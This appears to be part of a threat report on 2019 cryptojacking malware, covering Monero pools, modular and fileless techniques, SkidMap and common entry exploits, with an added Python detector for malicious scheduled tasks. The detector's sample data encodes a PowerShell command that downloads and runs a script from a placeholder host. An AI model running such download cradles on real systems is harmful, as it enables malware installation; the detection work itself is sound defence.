In 2019, the rise in cryptocurrency prices led to an increase in the number of cryptojacking malware families. Among these families, Monero mining trojans still dominated. EternalBlue and weak password cracking were the major methods for ransomware families to compromise large enterprises in the financial and telecom sectors and to spread themselves. At the same time, to defeat detection devices, cryptojacking malware families have been continually upgraded into new variants that feature better stealth and a modular design.
1. Monero mining remaining a much-pursued activity
According to statistics, the most commonly used mining pool in 2019 was pool.minexmr.com (46%). Most mining pools support Monero, an indirect indicator of the strong presence of Monero mining malware. Their IP addresses revealed that these mining pools were mostly located in North America and Europe, with only a small proportion in East Asia because of the cryptocurrency policies of the Chinese, Japanese, and South Korean governments. Monero is anonymous, fungible, and censorship resistant, which makes it the currency of choice for cryptojackers intent on hiding their traces from detection devices.
2. Modular design
Cryptojacking malware is coming to maturity. Some families show a tendency toward a modular design, which allows flexible configuration of different payloads for different campaigns.
A typical example of a modularized cryptojacker is WannaMine, which consists of scanning, exploit, download, persistence, and other modules. Although it is a cryptojacking family, WannaMine unexpectedly departed from its usual behavior in 2019 to spread DDoS payloads, indicating that different types of malware may cross boundaries when money is involved.
Untraceability is becoming increasingly important for cryptojacking malware, which explains why fileless attacks are gaining popularity. Cryptojackers using this technique are mainly built on PowerShell and use scheduled tasks to persist on systems without attracting attention.
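As an added defender-side example (not code from the report), the following Python check parses Task Scheduler XML definitions of the kind stored under C:\Windows\System32\Tasks and flags PowerShell actions that show the fileless traits described above: an encoded command (which it decodes), a hidden window, a suppressed profile, and a download cradle. The two task definitions and the indicator names are constructed for illustration.

```python
import base64
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}  # Task Scheduler XML namespace

# Indicators typical of fileless PowerShell persistence (indicator names are assumed labels).
INDICATORS = {
    "encoded_command": re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
}

def decode_encoded_command(args: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or '' if absent/invalid."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", args, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def audit_task_xml(xml_text: str) -> list:
    """Return the sorted indicator names found in a task's PowerShell Exec actions."""
    root = ET.fromstring(xml_text)
    found = set()
    for exec_node in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = (exec_node.findtext("t:Command", "", NS) or "").lower()
        args = exec_node.findtext("t:Arguments", "", NS) or ""
        if "powershell" not in cmd and "pwsh" not in cmd:
            continue  # only PowerShell actions are in scope here
        text = args + "\n" + decode_encoded_command(args)  # scan raw and decoded arguments
        for name, rx in INDICATORS.items():
            if rx.search(text):
                found.add(name)
    return sorted(found)

# Constructed sample task definitions (not real malware artifacts); the URL is a placeholder.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1')".encode("utf-16le")).decode()
SUSPICIOUS_TASK = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Actions><Exec><Command>powershell.exe</Command>
<Arguments>-nop -w hidden -e {ENCODED}</Arguments></Exec></Actions></Task>"""
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Actions><Exec><Command>powershell.exe</Command>
<Arguments>-ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1</Arguments></Exec></Actions></Task>"""
```

Running `audit_task_xml` over every XML file in the Tasks directory gives a quick triage list; a hit on `encoded_command` together with `download_cradle` is the pattern worth escalating.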
Moreover, cryptojacking malware is also tampering with system files and drivers. In September 2019, NSFOCUS detected a Monero cryptojacking attack launched by exploiting a vulnerability in Redis. The malicious payload used in this attack, SkidMap (as dubbed by McAfee and Trend Micro), replaced the binaries of multiple common Linux commands and loaded a malicious driver to avoid detection. This type of attack, which combines a backdoor and a rootkit, further improves the anonymity of the malware and is therefore more difficult to detect.
4. A myriad of compromise methods
In 2019, cryptojacking malware usually attacked targets by means of remote exploits. EternalBlue and exploits for vulnerabilities in web frameworks and services (Hadoop YARN, Apache Struts 2, Confluence, WebLogic, and Jenkins) were the ones most frequently used by cryptojackers to compromise targets and spread themselves. In addition, weak password cracking against Oracle, MySQL, and other databases was also a common attack method.
In terms of target sectors, finance and telecom were the two favorites of cryptojacking malware. These sectors usually deploy a large number of high-performance servers and personal computers to meet their business needs. Often these servers are not maintained as well as they should be, which makes it possible for cryptojackers to gain persistence.
For these reasons, IT managers and operators should upgrade and patch systems promptly and configure strong login passwords on devices to protect enterprises and individuals from being compromised by cryptojackers.
To be continued.